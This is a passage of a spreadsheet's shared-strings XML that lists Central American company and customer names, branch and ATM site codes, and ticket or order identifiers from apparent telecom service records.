    <t>VISUAL KNOWLEDGE CENTROAMERICA S.A.</t>
  </si>
  <si>
    <t>451738ON</t>
  </si>
  <si>
    <t>694900001T</t>
  </si>
  <si>
    <t>EL BAGEL</t>
  </si>
  <si>
    <t>698200006T</t>
  </si>
  <si>
    <t>F4529516</t>
  </si>
  <si>
    <t>F4529517</t>
  </si>
  <si>
    <t>F4527089</t>
  </si>
  <si>
    <t>F4535131</t>
  </si>
  <si>
    <t>876900002T</t>
  </si>
  <si>
    <t>CASTOR'S PIZZA</t>
  </si>
  <si>
    <t>625900064T</t>
  </si>
  <si>
    <t>F4532056</t>
  </si>
  <si>
    <t>758500061T</t>
  </si>
  <si>
    <t>F4529473</t>
  </si>
  <si>
    <t>CC_GMG_CR_INTERNET_T100_SAN_JOSE</t>
  </si>
  <si>
    <t>F4534149</t>
  </si>
  <si>
    <t>F4534145</t>
  </si>
  <si>
    <t>F4535241</t>
  </si>
  <si>
    <t>625900034T</t>
  </si>
  <si>
    <t>F4537469</t>
  </si>
  <si>
    <t>863400141T</t>
  </si>
  <si>
    <t>F4535148</t>
  </si>
  <si>
    <t>292900185T</t>
  </si>
  <si>
    <t>IP2225009SV</t>
  </si>
  <si>
    <t>1343391OH</t>
  </si>
  <si>
    <t>F4527068</t>
  </si>
  <si>
    <t>F4531036</t>
  </si>
  <si>
    <t>629100005T</t>
  </si>
  <si>
    <t>90001910295T</t>
  </si>
  <si>
    <t>F4534098</t>
  </si>
  <si>
    <t>F4536485</t>
  </si>
  <si>
    <t>F4537490</t>
  </si>
  <si>
    <t>F4530860</t>
  </si>
  <si>
    <t>F4526700</t>
  </si>
  <si>
    <t>728800021T</t>
  </si>
  <si>
    <t>F4532051</t>
  </si>
  <si>
    <t>1010807OH</t>
  </si>
  <si>
    <t>886700001T</t>
  </si>
  <si>
    <t>IGSS - DIRECCION DEPARTAMENTAL DE CHIMALTENANGO</t>
  </si>
  <si>
    <t>625900230T</t>
  </si>
  <si>
    <t>F4536488</t>
  </si>
  <si>
    <t>F4531504</t>
  </si>
  <si>
    <t>F4531505</t>
  </si>
  <si>
    <t>F4530750</t>
  </si>
  <si>
    <t>5614384ON</t>
  </si>
  <si>
    <t>292900096T</t>
  </si>
  <si>
    <t>F4535536</t>
  </si>
  <si>
    <t>F4535684</t>
  </si>
  <si>
    <t>F4536141</t>
  </si>
  <si>
    <t>3456546ON</t>
  </si>
  <si>
    <t>3254486ON</t>
  </si>
  <si>
    <t>535200077T</t>
  </si>
  <si>
    <t>F4527377</t>
  </si>
  <si>
    <t>F4538418</t>
  </si>
  <si>
    <t>F4537489</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0119</t>
  </si>
  <si>
    <t>F4533262</t>
  </si>
  <si>
    <t>F4534802</t>
  </si>
  <si>
    <t>90001911020T</t>
  </si>
  <si>
    <t>F4526821</t>
  </si>
  <si>
    <t>IPG003909SV</t>
  </si>
  <si>
    <t>MULTI INVERSIONES BANCO COOPERATIVO DE LOS TRABAJADORES S.C. DE R.L. DE C.V</t>
  </si>
  <si>
    <t>5186104ON</t>
  </si>
  <si>
    <t>4155998ON</t>
  </si>
  <si>
    <t>1028862OH</t>
  </si>
  <si>
    <t>OH1000807908/SUPERMERCADO LA COLONIA RECARGAS</t>
  </si>
  <si>
    <t>F4533402</t>
  </si>
  <si>
    <t>770600008T</t>
  </si>
  <si>
    <t>1675781OH</t>
  </si>
  <si>
    <t>F4527514</t>
  </si>
  <si>
    <t>F4533405</t>
  </si>
  <si>
    <t>340500030T</t>
  </si>
  <si>
    <t>F4530208</t>
  </si>
  <si>
    <t>5641635ON</t>
  </si>
  <si>
    <t>ID1026148SV</t>
  </si>
  <si>
    <t>YOON SAMSUN ELECTRONICS LATINOAMERICANA</t>
  </si>
  <si>
    <t>F4535151</t>
  </si>
  <si>
    <t>F4531534</t>
  </si>
  <si>
    <t>CONTR0001650612OC</t>
  </si>
  <si>
    <t>208200062T</t>
  </si>
  <si>
    <t>F4533668</t>
  </si>
  <si>
    <t>F4535152</t>
  </si>
  <si>
    <t>1502128OH</t>
  </si>
  <si>
    <t>TORNILLOS Y COMPLEMENTOS S DE R.L -</t>
  </si>
  <si>
    <t>570100010T</t>
  </si>
  <si>
    <t>957267OH</t>
  </si>
  <si>
    <t>F4537231</t>
  </si>
  <si>
    <t>F4537266</t>
  </si>
  <si>
    <t>F4537268</t>
  </si>
  <si>
    <t>5269877ON</t>
  </si>
  <si>
    <t>555400001T</t>
  </si>
  <si>
    <t>IMPORTADORA Y DISTRIBUIDORA DE ALIMENTOS DISTRITAL LIMITADA</t>
  </si>
  <si>
    <t>F4528854</t>
  </si>
  <si>
    <t>F4528696</t>
  </si>
  <si>
    <t>F4528697</t>
  </si>
  <si>
    <t>F4528681</t>
  </si>
  <si>
    <t>F4528694</t>
  </si>
  <si>
    <t>833316OC</t>
  </si>
  <si>
    <t>920836OH</t>
  </si>
  <si>
    <t>F4529518</t>
  </si>
  <si>
    <t>533300001T</t>
  </si>
  <si>
    <t>CENTRO GUATEMALTECO DE INVESTIGACION Y CAPACITACION DE LA CAÑA DE AZUCAR</t>
  </si>
  <si>
    <t>FMN082J</t>
  </si>
  <si>
    <t>F4538334</t>
  </si>
  <si>
    <t>IP2136079SV</t>
  </si>
  <si>
    <t>97100200T</t>
  </si>
  <si>
    <t>F4538441</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC000464</t>
  </si>
  <si>
    <t>F4538154</t>
  </si>
  <si>
    <t>F4538155</t>
  </si>
  <si>
    <t>CC_WALMART_SV_DDJ_LAS_TERRAZAS</t>
  </si>
  <si>
    <t>F4538122</t>
  </si>
  <si>
    <t>F4538123</t>
  </si>
  <si>
    <t>F4538255</t>
  </si>
  <si>
    <t>F4538156</t>
  </si>
  <si>
    <t>518770OH</t>
  </si>
  <si>
    <t>802700052T</t>
  </si>
  <si>
    <t>802700053T</t>
  </si>
  <si>
    <t>ID1304001SV</t>
  </si>
  <si>
    <t>MARIA ANTONIETA JOSEFINA BARILLAS DE NAVARRETE</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0749</t>
  </si>
  <si>
    <t>F4538700</t>
  </si>
  <si>
    <t>90001908647T</t>
  </si>
  <si>
    <t>F4530949</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_CIPRESALES</t>
  </si>
  <si>
    <t>F4527898</t>
  </si>
  <si>
    <t>3502431ON</t>
  </si>
  <si>
    <t>F4538252</t>
  </si>
  <si>
    <t>F4538256</t>
  </si>
  <si>
    <t>CC_GMG_GT_INTERNET_TIENDA_067</t>
  </si>
  <si>
    <t>F4538444</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0237</t>
  </si>
  <si>
    <t>F4538971</t>
  </si>
  <si>
    <t>5464657ON</t>
  </si>
  <si>
    <t>HOTEL AGUALCAS</t>
  </si>
  <si>
    <t>F4532557</t>
  </si>
  <si>
    <t>F4537960</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_CENTRAL_PRINCIPAL</t>
  </si>
  <si>
    <t>F4538437</t>
  </si>
  <si>
    <t>F4538439</t>
  </si>
  <si>
    <t>F4538744</t>
  </si>
  <si>
    <t>8200060T</t>
  </si>
  <si>
    <t>F4533425</t>
  </si>
  <si>
    <t>F4533426</t>
  </si>
  <si>
    <t>F4535319</t>
  </si>
  <si>
    <t>F4529782</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_INTERNET_CC_PRADERA_CHIMALTENANGO</t>
  </si>
  <si>
    <t>61200237T</t>
  </si>
  <si>
    <t>F4529012</t>
  </si>
  <si>
    <t>F4530745</t>
  </si>
  <si>
    <t>F4535573</t>
  </si>
  <si>
    <t>F4538116</t>
  </si>
  <si>
    <t>F4538357</t>
  </si>
  <si>
    <t>54700061T</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_INTERNET_AGENCIA_0140</t>
  </si>
  <si>
    <t>853400001T</t>
  </si>
  <si>
    <t>DELIVERY LAB, S.A.</t>
  </si>
  <si>
    <t>F4527688</t>
  </si>
  <si>
    <t>829800047T</t>
  </si>
  <si>
    <t>F4528059</t>
  </si>
  <si>
    <t>F4537703</t>
  </si>
  <si>
    <t>F4537704</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_INTERNET_MEGAPACA</t>
  </si>
  <si>
    <t>F4538288</t>
  </si>
  <si>
    <t>F4538369</t>
  </si>
  <si>
    <t>334900014T</t>
  </si>
  <si>
    <t>IP2149152SV</t>
  </si>
  <si>
    <t>UNIDAD TECNICA EJECUTIVA DEL SECTOR JUSTICIA</t>
  </si>
  <si>
    <t>F4528251</t>
  </si>
  <si>
    <t>F4530704</t>
  </si>
  <si>
    <t>F4529278</t>
  </si>
  <si>
    <t>344400571T</t>
  </si>
  <si>
    <t>F4529635</t>
  </si>
  <si>
    <t>8901172T</t>
  </si>
  <si>
    <t>F4530012</t>
  </si>
  <si>
    <t>331000053T</t>
  </si>
  <si>
    <t>F4534532</t>
  </si>
  <si>
    <t>770600124T</t>
  </si>
  <si>
    <t>61200225T</t>
  </si>
  <si>
    <t>F4537551</t>
  </si>
  <si>
    <t>F4537723</t>
  </si>
  <si>
    <t>F4532856</t>
  </si>
  <si>
    <t>F4532858</t>
  </si>
  <si>
    <t>14600021T</t>
  </si>
  <si>
    <t>F4527686</t>
  </si>
  <si>
    <t>90001908711T</t>
  </si>
  <si>
    <t>90001900862T</t>
  </si>
  <si>
    <t>758500166T</t>
  </si>
  <si>
    <t>927700001T</t>
  </si>
  <si>
    <t>F4528371</t>
  </si>
  <si>
    <t>F4528253</t>
  </si>
  <si>
    <t>F4537162</t>
  </si>
  <si>
    <t>F4538019</t>
  </si>
  <si>
    <t>F4538370</t>
  </si>
  <si>
    <t>F4535053</t>
  </si>
  <si>
    <t>CC_GMG_GT_INTERNET_TIENDA_103</t>
  </si>
  <si>
    <t>F4533976</t>
  </si>
  <si>
    <t>F4535209</t>
  </si>
  <si>
    <t>F4535479</t>
  </si>
  <si>
    <t>F4536095</t>
  </si>
  <si>
    <t>47502907T</t>
  </si>
  <si>
    <t>IP2136027SV</t>
  </si>
  <si>
    <t>292900544T</t>
  </si>
  <si>
    <t>TRANSACCIONES Y TRANSFERENCIAS</t>
  </si>
  <si>
    <t>F4538753</t>
  </si>
  <si>
    <t>F4538877</t>
  </si>
  <si>
    <t>F4538289</t>
  </si>
  <si>
    <t>22392000SV</t>
  </si>
  <si>
    <t>F4533491</t>
  </si>
  <si>
    <t>F4534740</t>
  </si>
  <si>
    <t>93400014T</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C156</t>
  </si>
  <si>
    <t>CC_BANTIGUA_GT_INTERNET_PERIROOSEVELT</t>
  </si>
  <si>
    <t>F4538333</t>
  </si>
  <si>
    <t>F4538661</t>
  </si>
  <si>
    <t>F4534789</t>
  </si>
  <si>
    <t>CC_GMG_SV_T077_PRADO_SENSUNTEPEQUE</t>
  </si>
  <si>
    <t>39300034T</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C156</t>
  </si>
  <si>
    <t>271200013T</t>
  </si>
  <si>
    <t>F4537515</t>
  </si>
  <si>
    <t>CC_UNICOMER_GT_INTERNET_METRONORTE_Z17</t>
  </si>
  <si>
    <t>ID1221007SV</t>
  </si>
  <si>
    <t>983477OH</t>
  </si>
  <si>
    <t>OH1000540352/PROTECCION AGROPECUARIA DE HONDURAS -</t>
  </si>
  <si>
    <t>8902040T</t>
  </si>
  <si>
    <t>25216500SV</t>
  </si>
  <si>
    <t>F4536130</t>
  </si>
  <si>
    <t>F4536358</t>
  </si>
  <si>
    <t>F4536418</t>
  </si>
  <si>
    <t>8901814T</t>
  </si>
  <si>
    <t>7900357T</t>
  </si>
  <si>
    <t>F4526479</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_AGENCIA_154</t>
  </si>
  <si>
    <t>F4534937</t>
  </si>
  <si>
    <t>25250900SV</t>
  </si>
  <si>
    <t>CENTRO AUDIOLOGICO MEDICO S.A DE C.V</t>
  </si>
  <si>
    <t>349900306T</t>
  </si>
  <si>
    <t>F4536491</t>
  </si>
  <si>
    <t>729900024T</t>
  </si>
  <si>
    <t>F4527110</t>
  </si>
  <si>
    <t>915000001T</t>
  </si>
  <si>
    <t>F4526750</t>
  </si>
  <si>
    <t>1714031OH</t>
  </si>
  <si>
    <t>OH1001074577</t>
  </si>
  <si>
    <t>1555296OH</t>
  </si>
  <si>
    <t>F4536419</t>
  </si>
  <si>
    <t>F4529504</t>
  </si>
  <si>
    <t>F4526604</t>
  </si>
  <si>
    <t>F4526482</t>
  </si>
  <si>
    <t>F4527109</t>
  </si>
  <si>
    <t>F4526751</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_T_55</t>
  </si>
  <si>
    <t>F4531252</t>
  </si>
  <si>
    <t>F4534553</t>
  </si>
  <si>
    <t>F4534885</t>
  </si>
  <si>
    <t>22093500SV</t>
  </si>
  <si>
    <t>PROGRAMA DE LAS NACIONES UNIDAS PARA EL DESARROLLO</t>
  </si>
  <si>
    <t>F4538635</t>
  </si>
  <si>
    <t>1539644OH</t>
  </si>
  <si>
    <t>1454458OH</t>
  </si>
  <si>
    <t>F4528241</t>
  </si>
  <si>
    <t>CC_CERVECERIA_GT_ALDEA_ASEQUIA_EL_PROGRESO_JUTIAPA</t>
  </si>
  <si>
    <t>IP2064023SV</t>
  </si>
  <si>
    <t>F4536131</t>
  </si>
  <si>
    <t>F4536552</t>
  </si>
  <si>
    <t>IP2142040SV</t>
  </si>
  <si>
    <t>F4528246</t>
  </si>
  <si>
    <t>F4529441</t>
  </si>
  <si>
    <t>F4533678</t>
  </si>
  <si>
    <t>535200057T</t>
  </si>
  <si>
    <t>F4535070</t>
  </si>
  <si>
    <t>F4533531</t>
  </si>
  <si>
    <t>F4526522</t>
  </si>
  <si>
    <t>F4532029</t>
  </si>
  <si>
    <t>F4533680</t>
  </si>
  <si>
    <t>F4536739</t>
  </si>
  <si>
    <t>F4532172</t>
  </si>
  <si>
    <t>42700359T</t>
  </si>
  <si>
    <t>397600001T</t>
  </si>
  <si>
    <t>LA MONTAÑA C Y R S.A.</t>
  </si>
  <si>
    <t>F4526523</t>
  </si>
  <si>
    <t>4415455ON</t>
  </si>
  <si>
    <t>ON0000689706/BANCO FICOHSA NICARAGUA, S.A-</t>
  </si>
  <si>
    <t>292900624T</t>
  </si>
  <si>
    <t>F4527675</t>
  </si>
  <si>
    <t>90001911165T</t>
  </si>
  <si>
    <t>F4531179</t>
  </si>
  <si>
    <t>556000003T</t>
  </si>
  <si>
    <t>IDEA ITALIA, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4533681</t>
  </si>
  <si>
    <t>559800007T</t>
  </si>
  <si>
    <t>FUMIGACIONES AEREAS DE CULTIVOS AGRICOLAS S.A.</t>
  </si>
  <si>
    <t>F4534830</t>
  </si>
  <si>
    <t>F4537317</t>
  </si>
  <si>
    <t>426100030T</t>
  </si>
  <si>
    <t>F4538787</t>
  </si>
  <si>
    <t>F4538865</t>
  </si>
  <si>
    <t>IP2135033SV</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4255</t>
  </si>
  <si>
    <t>F4538902</t>
  </si>
  <si>
    <t>4673448ON</t>
  </si>
  <si>
    <t>845400003T</t>
  </si>
  <si>
    <t>POCHTECA DE GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>4678475ON</t>
  </si>
  <si>
    <t>F4536706</t>
  </si>
  <si>
    <t>F4530977</t>
  </si>
  <si>
    <t>F4538569</t>
  </si>
  <si>
    <t>F4538922</t>
  </si>
  <si>
    <t>4166238ON</t>
  </si>
  <si>
    <t>344400218T</t>
  </si>
  <si>
    <t>F4535559</t>
  </si>
  <si>
    <t>47503077T</t>
  </si>
  <si>
    <t>F4529666</t>
  </si>
  <si>
    <t>ID1149065SV</t>
  </si>
  <si>
    <t>42700505T</t>
  </si>
  <si>
    <t>F4538662</t>
  </si>
  <si>
    <t>IP2091003SV</t>
  </si>
  <si>
    <t>F4527108</t>
  </si>
  <si>
    <t>ID1099151SV</t>
  </si>
  <si>
    <t>JUAN RAMON RECINOS SANCHEZ</t>
  </si>
  <si>
    <t>294700001T</t>
  </si>
  <si>
    <t>ALIMENTOS Y PREPARADOS INDUSTRIALES S.A.</t>
  </si>
  <si>
    <t>F4527201</t>
  </si>
  <si>
    <t>F4527202</t>
  </si>
  <si>
    <t>1717283OH</t>
  </si>
  <si>
    <t>OH1001075821</t>
  </si>
  <si>
    <t>625900242T</t>
  </si>
  <si>
    <t>F4530159</t>
  </si>
  <si>
    <t>F4529271</t>
  </si>
  <si>
    <t>886900003T</t>
  </si>
  <si>
    <t>PACER INTERNATIONAL CORPORATION GT, S.A..</t>
  </si>
  <si>
    <t>F4532246</t>
  </si>
  <si>
    <t>F4535831</t>
  </si>
  <si>
    <t>F4536415</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_RAMA_TELEMAN</t>
  </si>
  <si>
    <t>651200001T</t>
  </si>
  <si>
    <t>AUTOSERVICIOS COFAL, S.A.</t>
  </si>
  <si>
    <t>F4527567</t>
  </si>
  <si>
    <t>F4527568</t>
  </si>
  <si>
    <t>344400649T</t>
  </si>
  <si>
    <t>F4526719</t>
  </si>
  <si>
    <t>F4533524</t>
  </si>
  <si>
    <t>F4527159</t>
  </si>
  <si>
    <t>90001909787T</t>
  </si>
  <si>
    <t>F4527188</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC004188</t>
  </si>
  <si>
    <t>F4527055</t>
  </si>
  <si>
    <t>F4531048</t>
  </si>
  <si>
    <t>17400398T</t>
  </si>
  <si>
    <t>F4534241</t>
  </si>
  <si>
    <t>538600002T</t>
  </si>
  <si>
    <t>UNIVERSIDAD DE OCCIDENTE</t>
  </si>
  <si>
    <t>F4536572</t>
  </si>
  <si>
    <t>F4537712</t>
  </si>
  <si>
    <t>F4533527</t>
  </si>
  <si>
    <t>1634932OH</t>
  </si>
  <si>
    <t>OH1001049923</t>
  </si>
  <si>
    <t>F4527973</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM4691</t>
  </si>
  <si>
    <t>292900041T</t>
  </si>
  <si>
    <t>F4533443</t>
  </si>
  <si>
    <t>1551300OH</t>
  </si>
  <si>
    <t>ALMACENES EL TITAN S DE R.L. DE C.V.</t>
  </si>
  <si>
    <t>F4536128</t>
  </si>
  <si>
    <t>F4527420</t>
  </si>
  <si>
    <t>F4528794</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C705</t>
  </si>
  <si>
    <t>F4527974</t>
  </si>
  <si>
    <t>F4529447</t>
  </si>
  <si>
    <t>F4530805</t>
  </si>
  <si>
    <t>519000002T</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM65</t>
  </si>
  <si>
    <t>CC_POLLO_CAMPERO_GT_C152</t>
  </si>
  <si>
    <t>F4526723</t>
  </si>
  <si>
    <t>ID1050065SV</t>
  </si>
  <si>
    <t>MELENDEZ HERNANDEZ, JOSE EDUARDO</t>
  </si>
  <si>
    <t>IP2225011SV</t>
  </si>
  <si>
    <t>IP2276050SV</t>
  </si>
  <si>
    <t>90001910819T</t>
  </si>
  <si>
    <t>F4535437</t>
  </si>
  <si>
    <t>F4527054</t>
  </si>
  <si>
    <t>F4530809</t>
  </si>
  <si>
    <t>F4534853</t>
  </si>
  <si>
    <t>F4534854</t>
  </si>
  <si>
    <t>F4534855</t>
  </si>
  <si>
    <t>F4535639</t>
  </si>
  <si>
    <t>F4536849</t>
  </si>
  <si>
    <t>97100256T</t>
  </si>
  <si>
    <t>F4529444</t>
  </si>
  <si>
    <t>F4532545</t>
  </si>
  <si>
    <t>F4534138</t>
  </si>
  <si>
    <t>90001910580T</t>
  </si>
  <si>
    <t>F4537196</t>
  </si>
  <si>
    <t>F4537197</t>
  </si>
  <si>
    <t>F4537195</t>
  </si>
  <si>
    <t>450725ON</t>
  </si>
  <si>
    <t>614007ON</t>
  </si>
  <si>
    <t>CONTR0001456963OC</t>
  </si>
  <si>
    <t>F4537378</t>
  </si>
  <si>
    <t>47502886T</t>
  </si>
  <si>
    <t>F4527240</t>
  </si>
  <si>
    <t>886900002T</t>
  </si>
  <si>
    <t>F4528714</t>
  </si>
  <si>
    <t>F4531627</t>
  </si>
  <si>
    <t>IP2221004SV</t>
  </si>
  <si>
    <t>F4531970</t>
  </si>
  <si>
    <t>4715802ON</t>
  </si>
  <si>
    <t>ON0000123723</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3105</t>
  </si>
  <si>
    <t>CC_BANCO_AZTECA_SV_CHALATENANGO</t>
  </si>
  <si>
    <t>265900263T</t>
  </si>
  <si>
    <t>ID1064035SV</t>
  </si>
  <si>
    <t>24456600SV</t>
  </si>
  <si>
    <t>F4527241</t>
  </si>
  <si>
    <t>673000017T</t>
  </si>
  <si>
    <t>ID1112023SV</t>
  </si>
  <si>
    <t>F4533560</t>
  </si>
  <si>
    <t>CC_FENACOAC_GT_ECOSABA_Z1_SN_RAYMUNDO</t>
  </si>
  <si>
    <t>F4536164</t>
  </si>
  <si>
    <t>F4532177</t>
  </si>
  <si>
    <t>F4537313</t>
  </si>
  <si>
    <t>F4528338</t>
  </si>
  <si>
    <t>F4527606</t>
  </si>
  <si>
    <t>CC_PRONE_GT_SUPER_24_CC_LAS_FLORES</t>
  </si>
  <si>
    <t>F4528065</t>
  </si>
  <si>
    <t>F4534190</t>
  </si>
  <si>
    <t>CC_GYT_GT_AGENCIA_647</t>
  </si>
  <si>
    <t>CC_BANCO_AGRICOLA_SV_RAPICAJA_ILC_SONSONATE</t>
  </si>
  <si>
    <t>26338000SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL SAN FRANCISCO JAVIER</t>
  </si>
  <si>
    <t>F4528928</t>
  </si>
  <si>
    <t>1045353OH</t>
  </si>
  <si>
    <t>F4533253</t>
  </si>
  <si>
    <t>F4534794</t>
  </si>
  <si>
    <t>FLE001K</t>
  </si>
  <si>
    <t>886900004T</t>
  </si>
  <si>
    <t>F4537717</t>
  </si>
  <si>
    <t>672400017T</t>
  </si>
  <si>
    <t>IP2001238SV</t>
  </si>
  <si>
    <t>360300016T</t>
  </si>
  <si>
    <t>AGENCIAS DE VIAJES Y TURISMO TIVOLI S.A.</t>
  </si>
  <si>
    <t>F4532243</t>
  </si>
  <si>
    <t>F4532918</t>
  </si>
  <si>
    <t>8901757T</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM528</t>
  </si>
  <si>
    <t>F4528927</t>
  </si>
  <si>
    <t>F4537837</t>
  </si>
  <si>
    <t>F4528852</t>
  </si>
  <si>
    <t>F4532244</t>
  </si>
  <si>
    <t>392100201T</t>
  </si>
  <si>
    <t>297401330T</t>
  </si>
  <si>
    <t>F4534889</t>
  </si>
  <si>
    <t>F4538106</t>
  </si>
  <si>
    <t>ID1126039SV</t>
  </si>
  <si>
    <t>F4532245</t>
  </si>
  <si>
    <t>F4532414</t>
  </si>
  <si>
    <t>FMN096J</t>
  </si>
  <si>
    <t>331000134T</t>
  </si>
  <si>
    <t>24298200SV</t>
  </si>
  <si>
    <t>REFINERIA PETROLERA ACAJUTLA S.A.</t>
  </si>
  <si>
    <t>F4527061</t>
  </si>
  <si>
    <t>943900001T</t>
  </si>
  <si>
    <t>DIEGO HERRERA EONNET</t>
  </si>
  <si>
    <t>42700519T</t>
  </si>
  <si>
    <t>292900209T</t>
  </si>
  <si>
    <t>1254743OH</t>
  </si>
  <si>
    <t>F4536596</t>
  </si>
  <si>
    <t>F4539232</t>
  </si>
  <si>
    <t>F4527124</t>
  </si>
  <si>
    <t>735946OH</t>
  </si>
  <si>
    <t>F4533097</t>
  </si>
  <si>
    <t>F4537700</t>
  </si>
  <si>
    <t>F4527437</t>
  </si>
  <si>
    <t>886900001T</t>
  </si>
  <si>
    <t>444400016T</t>
  </si>
  <si>
    <t>F4534179</t>
  </si>
  <si>
    <t>1192981OH</t>
  </si>
  <si>
    <t>1032067OH</t>
  </si>
  <si>
    <t>OH1000712622/UNION INTERNACIONAL DE TELECOMUNICACIONES -</t>
  </si>
  <si>
    <t>90001907447T</t>
  </si>
  <si>
    <t>CC_TYT_GT_INSTITUCIONAL_PALACIO_MUNICIPAL</t>
  </si>
  <si>
    <t>F4534038</t>
  </si>
  <si>
    <t>F4536648</t>
  </si>
  <si>
    <t>F4537315</t>
  </si>
  <si>
    <t>F4538572</t>
  </si>
  <si>
    <t>F4529410</t>
  </si>
  <si>
    <t>F4530259</t>
  </si>
  <si>
    <t>F4535124</t>
  </si>
  <si>
    <t>CC_PRONE_GT_SUPER_24_ZONA2</t>
  </si>
  <si>
    <t>F4536875</t>
  </si>
  <si>
    <t>F4530931</t>
  </si>
  <si>
    <t>F4532404</t>
  </si>
  <si>
    <t>IDG000499SV</t>
  </si>
  <si>
    <t>Z.PLASTIC S.A. DE C.V.</t>
  </si>
  <si>
    <t>245700122T</t>
  </si>
  <si>
    <t>F4537184</t>
  </si>
  <si>
    <t>F4537136</t>
  </si>
  <si>
    <t>F4537321</t>
  </si>
  <si>
    <t>F4537380</t>
  </si>
  <si>
    <t>CC_CERVECERIA_GT_INYECTORES_DE_PLASTICO</t>
  </si>
  <si>
    <t>F4537384</t>
  </si>
  <si>
    <t>F4537381</t>
  </si>
  <si>
    <t>F4537383</t>
  </si>
  <si>
    <t>297401162T</t>
  </si>
  <si>
    <t>F4527936</t>
  </si>
  <si>
    <t>F4528772</t>
  </si>
  <si>
    <t>F4530733</t>
  </si>
  <si>
    <t>F4530734</t>
  </si>
  <si>
    <t>IP2024364SV</t>
  </si>
  <si>
    <t>F4532408</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_CENTRO_DE_DISTRITO_GUAZACAPAN</t>
  </si>
  <si>
    <t>865600001T</t>
  </si>
  <si>
    <t>DIVINE CORP, S.A</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_COLOMBA_COSTA_CUCA</t>
  </si>
  <si>
    <t>F4533241</t>
  </si>
  <si>
    <t>F4537388</t>
  </si>
  <si>
    <t>F4537389</t>
  </si>
  <si>
    <t>F4527937</t>
  </si>
  <si>
    <t>F4530160</t>
  </si>
  <si>
    <t>F4530162</t>
  </si>
  <si>
    <t>5557979ON</t>
  </si>
  <si>
    <t>47501953T</t>
  </si>
  <si>
    <t>F4529221</t>
  </si>
  <si>
    <t>F4537796</t>
  </si>
  <si>
    <t>F4528345</t>
  </si>
  <si>
    <t>F4537913</t>
  </si>
  <si>
    <t>F4530939</t>
  </si>
  <si>
    <t>F4531972</t>
  </si>
  <si>
    <t>F4533999</t>
  </si>
  <si>
    <t>F4538109</t>
  </si>
  <si>
    <t>F4532954</t>
  </si>
  <si>
    <t>ID1169006SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL DE CONCEPCION DE ATACO</t>
  </si>
  <si>
    <t>686300005T</t>
  </si>
  <si>
    <t>DIARIOS MODERNOS</t>
  </si>
  <si>
    <t>292900064T</t>
  </si>
  <si>
    <t>F4531385</t>
  </si>
  <si>
    <t>F4537297</t>
  </si>
  <si>
    <t>47501654T</t>
  </si>
  <si>
    <t>F4537498</t>
  </si>
  <si>
    <t>221100014T</t>
  </si>
  <si>
    <t>F4527080</t>
  </si>
  <si>
    <t>24862900SV</t>
  </si>
  <si>
    <t>F4529603</t>
  </si>
  <si>
    <t>90001910997T</t>
  </si>
  <si>
    <t>MP231101110SSV</t>
  </si>
  <si>
    <t>450541ON</t>
  </si>
  <si>
    <t>F4537597</t>
  </si>
  <si>
    <t>F4538581</t>
  </si>
  <si>
    <t>F4531649</t>
  </si>
  <si>
    <t>758500236T</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0329</t>
  </si>
  <si>
    <t>8902105T</t>
  </si>
  <si>
    <t>699500001T</t>
  </si>
  <si>
    <t>EPQ PORTUARIA QUETZAL</t>
  </si>
  <si>
    <t>F4528932</t>
  </si>
  <si>
    <t>90001909146T</t>
  </si>
  <si>
    <t>F4537629</t>
  </si>
  <si>
    <t>F4537776</t>
  </si>
  <si>
    <t>928100002T</t>
  </si>
  <si>
    <t>TARJETAS CUSCATLAN SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4538815</t>
  </si>
  <si>
    <t>F4531697</t>
  </si>
  <si>
    <t>F4533117</t>
  </si>
  <si>
    <t>F4533230</t>
  </si>
  <si>
    <t>F4536433</t>
  </si>
  <si>
    <t>F4537663</t>
  </si>
  <si>
    <t>90001904089T</t>
  </si>
  <si>
    <t>F4528406</t>
  </si>
  <si>
    <t>F4529163</t>
  </si>
  <si>
    <t>F4538162</t>
  </si>
  <si>
    <t>F4527471</t>
  </si>
  <si>
    <t>F4531389</t>
  </si>
  <si>
    <t>90001911297T</t>
  </si>
  <si>
    <t>355400020T</t>
  </si>
  <si>
    <t>4395237ON</t>
  </si>
  <si>
    <t>449575ON</t>
  </si>
  <si>
    <t>F4535450</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_ESCUINTLA_07</t>
  </si>
  <si>
    <t>F4538708</t>
  </si>
  <si>
    <t>ID1031105SV</t>
  </si>
  <si>
    <t>PINTO Y ASOCIADOS S.A DE C.V</t>
  </si>
  <si>
    <t>F4530823</t>
  </si>
  <si>
    <t>CONTR0001416328OC</t>
  </si>
  <si>
    <t>IP2024133SV</t>
  </si>
  <si>
    <t xml:space="preserve">BANCO ABANK,SOCIEDAD ANONIMA										</t>
  </si>
  <si>
    <t>F4532799</t>
  </si>
  <si>
    <t>F4533122</t>
  </si>
  <si>
    <t>F4533250</t>
  </si>
  <si>
    <t>F4534641</t>
  </si>
  <si>
